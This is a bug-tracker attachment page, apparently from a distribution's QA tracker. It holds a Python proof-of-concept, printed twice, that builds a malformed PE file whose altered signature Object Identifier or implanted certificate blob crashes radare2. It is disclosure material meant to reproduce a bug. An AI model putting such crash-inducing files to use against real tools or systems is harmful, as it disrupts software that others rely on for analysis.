Attachment 12538 Details for Bug 28476 – Python script to generate a faulty exe file from a PE file

Python script to generate a faulty exe file from a PE file

signtest.py (text/x-python3), 2.70 KB, created by Len Lawrence on 2021-03-28 16:24:56 CEST

(hide)

Description:

Filename:

MIME Type:

Creator: Len Lawrence

Created: 2021-03-28 16:24:56 CEST

Size: 2.70 KB

patch

obsolete

>#!/usr/bin/python3
>from subprocess import Popen, PIPE, STDOUT
>import pefile
>import sys
>import struct
>import os
>
># trigger a segfault in radare2 by modifing the Object Identifier in IMAGE_DIRECTORY_ENTRY_SECURITY (in PE files)
># bug found by S01den and Architect (with custom fuzzing)
>
>
>def get_offset(fname):
>    pe = pefile.PE(fname, fast_load = True)
>    pe.parse_data_directories( directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']])
>     
>    sig_offset = 0
>    found = 0
>     
>    for s in pe.__structures__:
>        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
>            sig_offset = s.VirtualAddress
>            print("[*] IMAGE_DIRECTORY_ENTRY_SECURITY offset = "+hex(sig_offset))
>            sig_len = s.Size
>            print("[*] Size: "+hex(sig_len))
>            if(sig_len <= 0):
>                sig_offset = 0
>     
>    pe.close()
>
>    return sig_offset
>
>print("__________                       _____  ________   _____  _________                      .__     ")
>print("\______   \_______  ____   _____/ ____\ \_____  \_/ ____\ \_   ___ \____________    _____|  |__  ")
>print("|     ___/\_  __ \/  _ \ /  _ \   __\   /   |   \   __\  /    \  \/\_  __ \__  \  /  ___/  |  \  ")
>print("|    |     |  | \(  <_> |  <_> )  |    /    |    \  |    \     \____|  | \// __ \_\___ \|   Y  \ ")
>print("|____|     |__|   \____/ \____/|__|    \_______  /__|     \______  /|__|  (____  /____  >___|  / ")
>print("                                                \/                \/            \/     \/     \/ ")
>
>fname = sys.argv[1]
>
>sig_offset = get_offset(fname)
>
>f = open(fname,'rb')
>content = bytearray(f.read())
>f.close()
>
>if(sig_offset == 0):
>    print("[!] Nothing found... Trying to implant anyway")
>    i = 0
>    exploit = b"\x80\x08\x00\x00\x00\x00\x02\x000\x82\x08s\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x08d0\x82\x08`\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x86\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x0b\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x01b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\x0b\x22"
>    while i != len(content)-123:
>        if content[i:i+123] == b"\x00"*123:
>            print(f"[*] Found space at {hex(i)}")
>            break
>        i += 1
>
>    pe = pefile.PE(fname, fast_load = True)
>
>    for s in pe.__structures__:
>        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
>            s.VirtualAddress = i
>            s.Size = 0x880
>            pe.set_bytes_at_offset(i, exploit)
>
>    pe.write(filename="output.exe")
>
>else:
>    print("[*] OID found !: "+hex(content[sig_offset+0x7a]))
>    content[sig_offset+0x7a] += 1
>    f = open("output.exe",'wb')
>    f.write(content)
>    f.close()
>
>print("[*] D0ne ! ----> output.exe")

#!/usr/bin/python3
from subprocess import Popen, PIPE, STDOUT
import pefile
import sys
import struct
import os

# trigger a segfault in radare2 by modifing the Object Identifier in IMAGE_DIRECTORY_ENTRY_SECURITY (in PE files)
# bug found by S01den and Architect (with custom fuzzing)


def get_offset(fname):
    pe = pefile.PE(fname, fast_load = True)
    pe.parse_data_directories( directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']])
     
    sig_offset = 0
    found = 0
     
    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            sig_offset = s.VirtualAddress
            print("[*] IMAGE_DIRECTORY_ENTRY_SECURITY offset = "+hex(sig_offset))
            sig_len = s.Size
            print("[*] Size: "+hex(sig_len))
            if(sig_len <= 0):
                sig_offset = 0
     
    pe.close()

    return sig_offset

print("__________                       _____  ________   _____  _________                      .__     ")
print("\______   \_______  ____   _____/ ____\ \_____  \_/ ____\ \_   ___ \____________    _____|  |__  ")
print("|     ___/\_  __ \/  _ \ /  _ \   __\   /   |   \   __\  /    \  \/\_  __ \__  \  /  ___/  |  \  ")
print("|    |     |  | \(  <_> |  <_> )  |    /    |    \  |    \     \____|  | \// __ \_\___ \|   Y  \ ")
print("|____|     |__|   \____/ \____/|__|    \_______  /__|     \______  /|__|  (____  /____  >___|  / ")
print("                                                \/                \/            \/     \/     \/ ")

fname = sys.argv[1]

sig_offset = get_offset(fname)

f = open(fname,'rb')
content = bytearray(f.read())
f.close()

if(sig_offset == 0):
    print("[!] Nothing found... Trying to implant anyway")
    i = 0
    exploit = b"\x80\x08\x00\x00\x00\x00\x02\x000\x82\x08s\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x08d0\x82\x08`\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x86\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x0b\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x01b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\x0b\x22"
    while i != len(content)-123:
        if content[i:i+123] == b"\x00"*123:
            print(f"[*] Found space at {hex(i)}")
            break
        i += 1

    pe = pefile.PE(fname, fast_load = True)

    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            s.VirtualAddress = i
            s.Size = 0x880
            pe.set_bytes_at_offset(i, exploit)

    pe.write(filename="output.exe")

else:
    print("[*] OID found !: "+hex(content[sig_offset+0x7a]))
    content[sig_offset+0x7a] += 1
    f = open("output.exe",'wb')
    f.write(content)
    f.close()

print("[*] D0ne ! ----> output.exe")

Actions: View

Attachments on bug 28476: 12537 | 12538